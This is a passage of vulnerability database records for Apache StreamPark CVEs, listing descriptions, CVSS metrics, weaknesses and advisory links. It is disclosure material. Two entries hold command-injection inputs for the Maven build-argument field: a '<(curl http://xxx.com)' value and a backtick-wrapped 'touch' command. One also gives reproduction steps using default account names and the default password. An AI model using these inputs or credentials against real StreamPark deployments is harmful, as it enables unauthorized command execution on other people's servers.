"value": "En Streampark (versi\u00f3n \u0026lt;2.1.4), cuando un usuario iniciaba sesi\u00f3n correctamente, el servicio backend devolv\u00eda \"Autorizaci\u00f3n\" como credencial de autenticaci\u00f3n de front-end. El usuario puede usar esta credencial para solicitar informaci\u00f3n de otros usuarios, incluido el nombre de usuario, la contrase\u00f1a, el valor de sal, etc. del administrador. Mitigaci\u00f3n: todos los usuarios deben actualizar a 2.1.4"
}
],
"id": "CVE-2024-29120",
"lastModified": "2025-06-23T18:09:18.427",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.5,
"impactScore": 3.4,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2024-07-17T15:15:14.090",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/17/4"
},
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/y3oqz7l8vd7jxxx3z2khgl625nvfr60j"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/17/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/y3oqz7l8vd7jxxx3z2khgl625nvfr60j"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-212"
}
],
"source": "security@apache.org",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-922"
}
],
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
}
FKIE_CVE-2023-52291
Vulnerability from fkie_nvd - Published: 2024-07-17 09:15 - Updated: 2025-02-13 18:15
Severity ?
4.7 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Summary
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Background:
In the "Project" module, the maven build args “<” operator causes command injection. e.g : “< (curl http://xxx.com )” will be executed as a command injection,
Mitigation:
all users should upgrade to 2.1.4, The "<" operator will blocked。
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| apache | streampark | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EA1D77DB-B854-44DA-9749-A3F326BD4D06",
"versionEndExcluding": "2.1.4",
"versionStartIncluding": "2.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In streampark, the project module integrates Maven\u0027s compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nBackground:\n\nIn the \"Project\" module, the maven build args\u00a0\u00a0\u201c\u003c\u201d operator causes command injection. e.g : \u201c\u003c (curl\u00a0 http://xxx.com )\u201d will be executed as a command injection,\n\nMitigation:\n\nall users should upgrade to 2.1.4,\u00a0 The \"\u003c\" operator will blocked\u3002"
},
{
"lang": "es",
"value": "En Streampark, el m\u00f3dulo del proyecto integra las capacidades de compilaci\u00f3n de Maven. La validaci\u00f3n de los par\u00e1metros de entrada no es estricta, lo que permite a los atacantes insertar comandos para la ejecuci\u00f3n remota de comandos. El requisito previo para un ataque exitoso es que el usuario debe iniciar sesi\u00f3n en el sistema Streampark y tener permisos a nivel de sistema. Generalmente, s\u00f3lo los usuarios de ese sistema tienen autorizaci\u00f3n para iniciar sesi\u00f3n y los usuarios no ingresar\u00edan manualmente un comando de operaci\u00f3n peligroso. Por tanto, el nivel de riesgo de esta vulnerabilidad es muy bajo. Antecedentes: en el m\u00f3dulo \"Proyecto\", el operador maven build args \u201c\u0026lt;\u201d provoca la inyecci\u00f3n de comandos. Por ejemplo: \u201c\u0026lt; (curl http://xxx.com)\u201d se ejecutar\u00e1 como una inyecci\u00f3n de comando. Mitigaci\u00f3n: todos los usuarios deben actualizar a 2.1.4. El operador \"\u0026lt;\" se bloquear\u00e1."
}
],
"id": "CVE-2023-52291",
"lastModified": "2025-02-13T18:15:54.277",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 3.4,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2024-07-17T09:15:02.410",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/17/1"
},
{
"source": "security@apache.org",
"tags": [
"Mailing List"
],
"url": "https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/17/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-77"
}
],
"source": "security@apache.org",
"type": "Secondary"
}
]
}
FKIE_CVE-2024-29737
Vulnerability from fkie_nvd - Published: 2024-07-17 09:15 - Updated: 2025-02-13 18:17
Severity ?
4.7 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Summary
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Mitigation:
all users should upgrade to 2.1.4
Background info:
Log in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input `touch /tmp/success_2.1.2` as the "Build Argument". Note that there is no verification and interception of the special character "`". As a result, you will find that this injection command will be successfully executed after executing the build.
In the latest version, the special symbol ` is intercepted.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| apache | streampark | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EA1D77DB-B854-44DA-9749-A3F326BD4D06",
"versionEndExcluding": "2.1.4",
"versionStartIncluding": "2.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In streampark, the project module integrates Maven\u0027s compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nMitigation:\n\nall users should upgrade to 2.1.4\n\nBackground info:\n\nLog in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input `touch /tmp/success_2.1.2` as the \"Build Argument\". Note that there is no verification and interception of the special character \"`\". As a result, you will find that this injection command will be successfully executed after executing the build.\n\nIn the latest version, the special symbol ` is intercepted."
},
{
"lang": "es",
"value": "En Streampark, el m\u00f3dulo del proyecto integra las capacidades de compilaci\u00f3n de Maven. La validaci\u00f3n de los par\u00e1metros de entrada no es estricta, lo que permite a los atacantes insertar comandos para la ejecuci\u00f3n remota de comandos. El requisito previo para un ataque exitoso es que el usuario debe iniciar sesi\u00f3n en el sistema Streampark y tener permisos a nivel de sistema. Generalmente, s\u00f3lo los usuarios de ese sistema tienen autorizaci\u00f3n para iniciar sesi\u00f3n y los usuarios no ingresar\u00edan manualmente un comando de operaci\u00f3n peligroso. Por tanto, el nivel de riesgo de esta vulnerabilidad es muy bajo. Mitigaci\u00f3n: todos los usuarios deben actualizar a 2.1.4 Informaci\u00f3n general: inicie sesi\u00f3n en Streampark utilizando el nombre de usuario predeterminado (por ejemplo, test1, test2, test3) y la contrase\u00f1a predeterminada (streampark). Navegue hasta el m\u00f3dulo Proyecto y luego agregue un nuevo proyecto. Ingrese la direcci\u00f3n del repositorio git del proyecto e ingrese `touch /tmp/success_2.1.2` como \"Argumento de compilaci\u00f3n\". Tenga en cuenta que no existe verificaci\u00f3n ni interceptaci\u00f3n del car\u00e1cter especial \"`\". Como resultado, encontrar\u00e1 que este comando de inyecci\u00f3n se ejecutar\u00e1 con \u00e9xito despu\u00e9s de ejecutar la compilaci\u00f3n. En la \u00faltima versi\u00f3n, se intercepta el s\u00edmbolo especial `."
}
],
"id": "CVE-2024-29737",
"lastModified": "2025-02-13T18:17:50.797",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 3.4,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2024-07-17T09:15:02.527",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/17/2"
},
{
"source": "security@apache.org",
"tags": [
"Mailing List"
],
"url": "https://lists.apache.org/thread/xhx7jt1t24s6d7o435wxng8t0ojfbfh5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/17/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "https://lists.apache.org/thread/xhx7jt1t24s6d7o435wxng8t0ojfbfh5"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-77"
}
],
"source": "security@apache.org",
"type": "Secondary"
}
]
}
CVE-2025-53960 (GCVE-0-2025-53960)
Vulnerability from cvelistv5 – Published: 2025-12-12 15:15 – Updated: 2025-12-16 10:08
VLAI?
Title
Apache StreamPark: Uses the user’s password as the secret key
Summary
When issuing JSON Web Tokens (JWT), Apache StreamPark directly uses the user's password as the HMAC signing key (e.g., with the HS256 algorithm). An attacker can exploit this vulnerability to perform offline brute-force attacks on the user's password using a captured JWT, or to arbitrarily forge identity tokens for the user if the password is already known, ultimately leading to complete account takeover.
This issue affects Apache StreamPark: from 2.0.0 before 2.1.7.
Users are recommended to upgrade to version 2.1.7, which fixes the issue.
Severity ?
No CVSS data available.
CWE
- CWE-1240 - Use of a Cryptographic Primitive with a Risky Implementation
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
2.0.0 , < 2.1.7
(semver)
|
Credits
omkar parkhe <omkarparth@gmail.com>
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-12-12T16:05:44.468Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/12/04/1"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-53960",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-12T18:47:19.959060Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-12T18:47:22.376Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.7",
"status": "affected",
"version": "2.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "omkar parkhe \u003comkarparth@gmail.com\u003e"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003e\u003c/p\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cp\u003eWhen issuing JSON Web Tokens (JWT), Apache StreamPark directly uses the user\u0027s password as the HMAC signing key (e.g., with the HS256 algorithm). An attacker can exploit this vulnerability to perform offline brute-force attacks on the user\u0027s password using a captured JWT, or to arbitrarily forge identity tokens for the user if the password is already known, ultimately leading to complete account takeover.\u003cbr\u003e\u003cbr\u003e\u003c/p\u003e\u003c/div\u003e\u003c/div\u003eThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\u003cp\u003e\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 2.1.7, which fixes the issue.\u003c/p\u003e"
}
],
"value": "When issuing JSON Web Tokens (JWT), Apache StreamPark directly uses the user\u0027s password as the HMAC signing key (e.g., with the HS256 algorithm). An attacker can exploit this vulnerability to perform offline brute-force attacks on the user\u0027s password using a captured JWT, or to arbitrarily forge identity tokens for the user if the password is already known, ultimately leading to complete account takeover.\n\n\n\n\n\n\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1240",
"description": "CWE-1240 Use of a Cryptographic Primitive with a Risky Implementation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-16T10:08:36.613Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/xlpvfzf5l5m5mfyjwrz5h4dssm3c32vy"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark: Uses the user\u2019s password as the secret key",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2025-53960",
"datePublished": "2025-12-12T15:15:49.443Z",
"dateReserved": "2025-07-15T15:10:34.714Z",
"dateUpdated": "2025-12-16T10:08:36.613Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-54947 (GCVE-0-2025-54947)
Vulnerability from cvelistv5 – Published: 2025-12-12 15:11 – Updated: 2025-12-12 18:48
VLAI?
Title
Apache StreamPark: Use hard-coded key vulnerability
Summary
In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access.
This issue affects Apache StreamPark: from 2.0.0 before 2.1.7.
Users are recommended to upgrade to version 2.1.7, which fixes the issue.
Severity ?
No CVSS data available.
CWE
- CWE-321 - Use of Hard-coded Cryptographic Key
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
2.0.0 , < 2.1.7
(semver)
|
Credits
omkarparth@gmail.com
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-12-12T18:04:57.034Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/12/12/3"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-54947",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-12T18:48:43.558729Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-12T18:48:51.364Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.7",
"status": "affected",
"version": "2.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "omkarparth@gmail.com"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eIn Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access.\u003c/p\u003e\u003cp\u003eThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 2.1.7, which fixes the issue.\u003c/p\u003e"
}
],
"value": "In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access.\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-321",
"description": "CWE-321 Use of Hard-coded Cryptographic Key",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-12T15:11:38.279Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/kdntmzyzrco75x9q6mc6s8lty1fxmog1"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark: Use hard-coded key vulnerability",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2025-54947",
"datePublished": "2025-12-12T15:11:38.279Z",
"dateReserved": "2025-08-01T09:20:24.478Z",
"dateUpdated": "2025-12-12T18:48:51.364Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-54981 (GCVE-0-2025-54981)
Vulnerability from cvelistv5 – Published: 2025-12-12 15:10 – Updated: 2025-12-12 19:27
VLAI?
Title
Apache StreamPark: Weak Encryption Algorithm in StreamPark
Summary
Weak Encryption Algorithm in StreamPark, The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data
This issue affects Apache StreamPark: from 2.0.0 before 2.1.7.
Users are recommended to upgrade to version 2.1.7, which fixes the issue.
Severity ?
No CVSS data available.
CWE
- CWE-327 - Use of a Broken or Risky Cryptographic Algorithm
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
2.0.0 , < 2.1.7
(semver)
|
Credits
omkar parkhe <omkarparth@gmail.com>
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-12-12T18:04:58.530Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/12/12/4"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-54981",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-12T19:26:21.927771Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-12T19:27:16.118Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.7",
"status": "affected",
"version": "2.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "omkar parkhe \u003comkarparth@gmail.com\u003e"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eWeak Encryption Algorithm in StreamPark,\u0026nbsp;The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data\u003cbr\u003e\u003c/span\u003e\u003cbr\u003eThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 2.1.7, which fixes the issue.\u003c/p\u003e"
}
],
"value": "Weak Encryption Algorithm in StreamPark,\u00a0The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-327",
"description": "CWE-327 Use of a Broken or Risky Cryptographic Algorithm",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-12T15:10:35.562Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/9rbvdvwg5fdhzjdgyrholgso53r26998"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark: Weak Encryption Algorithm in StreamPark",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2025-54981",
"datePublished": "2025-12-12T15:10:35.562Z",
"dateReserved": "2025-08-04T10:13:02.810Z",
"dateUpdated": "2025-12-12T19:27:16.118Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-30001 (GCVE-0-2025-30001)
Vulnerability from cvelistv5 – Published: 2025-10-10 09:52 – Updated: 2025-11-04 21:09
VLAI?
Title
Apache StreamPark: Authenticated users can trigger remote command execution
Summary
Incorrect Execution-Assigned Permissions vulnerability in Apache StreamPark.
This issue affects Apache StreamPark: from 2.1.4 before 2.1.6.
Users are recommended to upgrade to version 2.1.6, which fixes the issue.
Severity ?
No CVSS data available.
CWE
- CWE-279 - Incorrect Execution-Assigned Permissions
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
2.1.4 , < 2.1.6
(semver)
|
Credits
Liufeng Yi (ylf@yiliufeng.net)
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-30001",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-10T18:58:38.235909Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-10T18:58:42.825Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T21:09:55.311Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
